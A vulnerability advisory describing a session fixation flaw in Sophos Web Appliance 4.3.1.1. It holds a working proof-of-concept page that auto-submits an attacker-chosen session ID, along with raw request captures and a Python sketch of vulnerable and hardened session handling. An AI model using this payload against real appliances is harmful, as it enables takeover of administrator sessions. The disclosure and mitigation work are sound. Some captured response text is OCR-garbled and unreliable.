Qualys Security Advisory QSA-2017-02-28 


February 28, 2017 


Session Fixation Vulnerability in Sophos Secure Web Appliance 


SYNOPSIS: 


Sophos Secure Web Appliance (Hardware and/or Virtual) v4.3.1.1 does not invalidate pre-login Session IDs 
when a user logs in, and accepts arbitrary Session IDs supplied by users/attackers, which allows sessions to be fixed. 


Reference: https://www.sophos.com/en-us/products/secure-web-gateway.aspx 


CVE: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6412 


VULNERABILITY DETAILS: 
Lab Setup: 


1. Target: Sophos Web Appliance 
2. Target IP Address: 192.168.253.147 
3. Site Hosting Malicious Session Fixation Page: http://MaliciousKali.com 


Vulnerable/Tested Version: 


Sophos Web Appliance version 4.3.1.1 is affected. Older versions may also be affected. 


Sophos Web Appliance running latest version (screenshot not reproduced). 


Vulnerability: Session Fixation Vulnerability 


An unauthenticated, remote attacker could host a malicious page on his website that makes a POST request to 
the victim's Sophos Web Appliance to set the Session ID using the STYLE parameter. The appliance does not 
validate whether the Session ID sent by the user's browser was issued by the appliance itself or fixed by the attacker. 


Also, the appliance does not invalidate the pre-login Session ID it issued earlier once the user logs in successfully. 
It continues to use the same pre-login Session ID instead of invalidating it and issuing a new one. 


Risk Factor: High 


Impact: 


If the victim visits a malicious website that sends a POST request with a fixed Session ID of the attacker's choosing to the 
Sophos Web Appliance, the victim ends up logging in to the appliance's web management console with that 
same Session ID. The attacker can then use the same Session ID to hijack the victim's session and would have full 
control over the appliance if the victim has administrative privileges. 


CVSS Score: AV:N/AC:M/Au:S/C:C/I:C/A:C 


Proof-Of-Concept: 


1. Host a webpage on the malicious site that sends a POST request with a fixed Session ID in the STYLE 
parameter to the Sophos Web Appliance. 


http://maliciouskali.com/Sophos-Fixation.html 


Sophos-Fixation.html (served from /var/www/html): 

<html> 
<body> 
<form name="Sophos Login" action="https://192.168.253.147/index.php?c=login" method="POST"> 
<!-- attacker-chosen 32-character hex Session ID; the exact value is illegible in the original capture --> 
<input type="hidden" name="STYLE" value="<FIXED_SESSION_ID>"> 
</form> 
<script> 
window.onload = function(){ 
    document.forms['Sophos Login'].submit(); 
}; 
</script> 
</body> 
</html> 


Note: The Session ID highlighted was obtained as an unauthenticated user and I then changed its last 
letter from a to b 


2. Victim visits the malicious page http://maliciouskali.com/Sophos-Fixation.html 


Proxy history (CSS, image and general binary content hidden): 

#   | Host                    | Method | URL                                | Status | Length | MIME type | Extension | Title 
72  | https://192.168.253.147 | POST   | /index.php?c=login                 | 200    | 4870   | HTML      | php       | Sophos Web Applia... 
75  | https://192.168.253.147 | GET    | /2667300/resources/javascripts/... | 200    | 140997 | script    | js        | 
77  | https://192.168.253.147 | GET    | /2667300/resources/javascripts/... | 200    | 1537   | script    | js        | 
78  | https://192.168.253.147 | GET    | /2667300/resources/javascripts/... | 200    | 32470  | script    | js        | 
82  | https://192.168.253.147 | POST   | /index.php?c=login                 | 200    | 42085  | HTML      | php       | Sophos Web Applia... 
86  | https://192.168.253.147 | GET    | /2667300/resources/javascripts/... | 200    | 675084 | script    | js        | 
87  | https://192.168.253.147 | GET    | /2667300/resources/javascripts/... | 200    | 35983  | script    | js        | 
99  | https://192.168.253.147 | POST   | /index.php?c=dashboard             | 200    | 542    | JSON      | php       | 
100 | https://192.168.253.147 | POST   | /index.php?c=dashboard             | 200    | 1357   | JSON      | php       | 


Response (Raw): 


HTTP/1.1 200 OK 
Date: Tue, 28 Feb 2017 15:20:39 GMT 
Server: Apache/2.4.23 (Debian) 
Last-Modified: Tue, 28 Feb 2017 15:20:01 GMT 
ETag: "135-54998bac71b50-gzip" 
Accept-Ranges: bytes 
Vary: Accept-Encoding 
Content-Length: 309 
Connection: close 
Content-Type: text/html 

<html> 
<body> 
<form name="Sophos Login" action="https://192.168.253.147/index.php?c=login" method="POST"> 
<input type="hidden" name="STYLE" value="<FIXED_SESSION_ID>"> 
Note: For demonstration purposes, the malicious page sets the Session ID and redirects the victim to the 
appliance's login page. However, an attacker could use a different technique. Also note that the victim's 
browser cache was cleared to make sure that the results are not from past logins. 


3. Victim logs into the appliance with admin privileges. 


Proxy history (CSS, image and general binary content hidden): the same requests 72 to 100 as above, preceded by 
request 71, GET http://maliciouskali.com/Sophos-Fixation.html (200, 585 bytes, HTML, from 192.168.253.130). 
Request 82, the POST to /index.php?c=login, is selected. 


Request (Raw): 


POST /index.php?c=login HTTP/1.1 
Host: 192.168.253.147 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
Referer: http://maliciouskali.com/Sophos-Fixation.html 
Connection: close 
Upgrade-Insecure-Requests: 1 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 38 

STYLE=<FIXED_SESSION_ID> 


The same Session ID was sent to the appliance. 


The appliance logs the victim in with the same Session ID that was fixed by the attacker. 


Proxy history (CSS, image and general binary content hidden): requests 71 to 100 as above; the response to 
request 82, the POST to /index.php?c=login, is selected. 


Response (Raw): 


PM\" ,\"cma\": {\"joined\" :false,\"host\":\"\",\"is_cma\":false,\"swa_joined\":false,\"is_vm\":true},\"locale\":\"en\",\"trialMode\":true,\"licenseDaysLeft\" :29,\"navig 
ation\":[],\"navigation left\":[],\"status_ no threat_list\":\"Threat list 
unavailable\" ,\"status_system_ok\":\"0K\",\"status_system_caution\":\"Warning\",\"status_system_error\":\"Error\",\"status_system_unknown\" :\"Unknown\" ,\"uiStatusMess 
ages\":{\"status no threat_list\":\"Threat list 
unavailable\" ,\"status_system_ok\":\"0K\",\"status_system_caution\":\"Warning\" ,\"status_system_error\":\"Error\",\"status_system_unknown\" :\"Unknown\"},\"rba\":{\"re 
ports\":true,\"search\":true,\"configuration\":true,\"system_status\":true,\"help support\":true,\"editable\":true,\"current_user\":\"admin\" ,\"globalUser\":false,\"a 
dmin_role\":true}}"}); 

args.set('WSA_BUILD', 2667300) ; 

args set('SIDT, ' STYLE-0130b22021a7BIEAC099649e945aa27H' ) ; 

args.set('remoteMon', 'no'); 

args.set('remoteEnabled', 'no'); 


Sophos .widget .CleanCssButtons() ; 
fa 13> *f 
</script> 
Proxy history (CSS, image and general binary content hidden): requests 71 to 100 as above; request 100, 
the POST to /index.php?c=dashboard, is selected. 


Request (Raw): 

POST /index.php?c=dashboard HTTP/1.1 
Host: 192.168.253.147 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0 
Accept: */* 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate, br 
X-Requested-With: XMLHttpRequest 
Content-Type: application/x-www-form-urlencoded 
Referer: https://192.168.253.147/index.php?c=login 
Content-Length: 51 
Connection: close 

action=clock&STYLE=<FIXED_SESSION_ID> 
Proxy history (CSS, image and general binary content hidden): request 269, POST /index.php?c=dashboard. 


Screenshot of the appliance's Configuration page: "The configuration homepage provides links to common 
post-installation procedures. Use the list below to access these configuration steps." 


Proxy history (CSS, image and general binary content hidden): requests 249 to 253, POST /index.php?c=dashboard, 
all answered 200 with JSON (542 and 1357 bytes). 


An attacker can use the same Session ID to hijack victim’s session. 


Potential Mitigation: 


It is recommended to discard/invalidate the pre-login Session ID as soon as the user logs in and issue a new 
Session ID. Also, reject Session IDs that the application never issued to any user. 


OWASP Recommendation: https://www.owasp.org/index.php/Session_Fixation_Protection 
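The following is an added illustration of the two mitigations above (reject unissued Session IDs, regenerate the ID on login) placed side by side with a model of the reported behaviour. It is example code written for this advisory, not Sophos appliance code or Qualys tooling; the credential table, the session-store API and the scenario steps are constructed for the demonstration, and the STYLE parameter is stood in for by plain string IDs.

```python
import hmac
import secrets

# Constructed credential table for the demonstration (not real appliance accounts).
USERS = {"admin": "correct horse battery staple"}


def _password_ok(username, password):
    expected = USERS.get(username)
    return expected is not None and hmac.compare_digest(expected, password)


class VulnerableSessions:
    """Models the advisory's finding: any presented ID is adopted as a session,
    and the pre-login ID is kept unchanged after a successful login."""

    def __init__(self):
        self.sessions = {}  # session id -> {"user": None or username}

    def resolve(self, presented):
        sid = presented or secrets.token_hex(16)          # 32 hex chars, like STYLE
        self.sessions.setdefault(sid, {"user": None})     # adopts attacker-chosen IDs
        return sid

    def login(self, sid, username, password):
        if not _password_ok(username, password):
            return None
        self.sessions[sid]["user"] = username             # same ID before and after login
        return sid

    def user_for(self, sid):
        entry = self.sessions.get(sid)
        return entry["user"] if entry else None


class HardenedSessions:
    """Mitigated store: only server-issued IDs are honoured, and a successful
    login discards the pre-login ID and issues a fresh one."""

    def __init__(self):
        self.sessions = {}
        self.rejected = []  # unknown IDs seen on the wire; worth logging for detection

    def resolve(self, presented):
        if presented in self.sessions:
            return presented
        if presented is not None:
            self.rejected.append(presented)               # never issued by us: ignore it
        sid = secrets.token_hex(16)
        self.sessions[sid] = {"user": None}
        return sid

    def login(self, sid, username, password):
        if not _password_ok(username, password):
            return None
        self.sessions.pop(sid, None)                      # invalidate the pre-login ID
        new_sid = secrets.token_hex(16)                   # issue a post-login ID
        self.sessions[new_sid] = {"user": username}
        return new_sid

    def user_for(self, sid):
        entry = self.sessions.get(sid)
        return entry["user"] if entry else None


def run_fixation_scenario(store):
    """Replays the advisory's steps against `store` and reports whether the
    attacker-chosen ID ends up bound to the victim's admin login."""
    # 1. an unauthenticated visit yields a pre-login ID; its last character is altered
    issued = store.resolve(None)
    fixed = issued[:-1] + ("b" if issued[-1] != "b" else "a")
    # 2. the victim's browser is made to present the fixed ID
    victim_pre = store.resolve(fixed)
    # 3. the victim logs in as admin
    victim_post = store.login(victim_pre, "admin", USERS["admin"])
    # 4. does the fixed ID now map to the admin session?
    return {
        "fixed": fixed,
        "victim_pre": victim_pre,
        "victim_post": victim_post,
        "hijacked": store.user_for(fixed) == "admin",
    }


if __name__ == "__main__":
    print("vulnerable:", run_fixation_scenario(VulnerableSessions())["hijacked"])  # True
    print("hardened:  ", run_fixation_scenario(HardenedSessions())["hijacked"])    # False
```

In the hardened store the victim's browser never gets to keep the presented ID (resolve hands out a fresh one and records the rejected value), and the ID that authenticates the admin session did not exist before the login succeeded, so nothing the attacker learned beforehand maps to it. The `rejected` list is the detection hook: a burst of unknown Session IDs arriving at the login endpoint is the signal a defender would alert on.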


CREDITS: 


The discovery and documentation of this vulnerability was conducted by Kapil Khot, Qualys 
Vulnerability Signature/Research Team. 


CONTACT: 


For more information about the Qualys Security Research Team, visit our website at 
http://www.qualys.com or send email to research@qualys.com 


LEGAL NOTICE: 


The information contained within this advisory is Copyright (C) 2017 Qualys Inc. It may be redistributed 
provided that no fee is charged for distribution and that the advisory is not modified in any way. 


